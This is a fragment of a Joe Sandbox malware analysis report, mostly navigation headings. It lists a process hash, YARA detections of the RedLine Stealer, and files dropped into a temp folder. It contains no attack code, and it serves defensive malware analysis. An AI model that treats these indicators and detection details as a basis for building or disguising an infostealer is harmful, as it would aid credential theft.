Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
Imagebase:	0xb10000
File size:	47'584 bytes
MD5 hash:	94C8E57A80DFCA2482DEDB87B93D4FD9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000013.00000002.2411191854.0000000000BE2000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 00000013.00000002.2411191854.0000000000BE2000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: RedLine

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bel.tmp

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Dici.tmp

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inclina.tmp

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\u (copy)

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\xBCzEiVyOcVH.dll

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe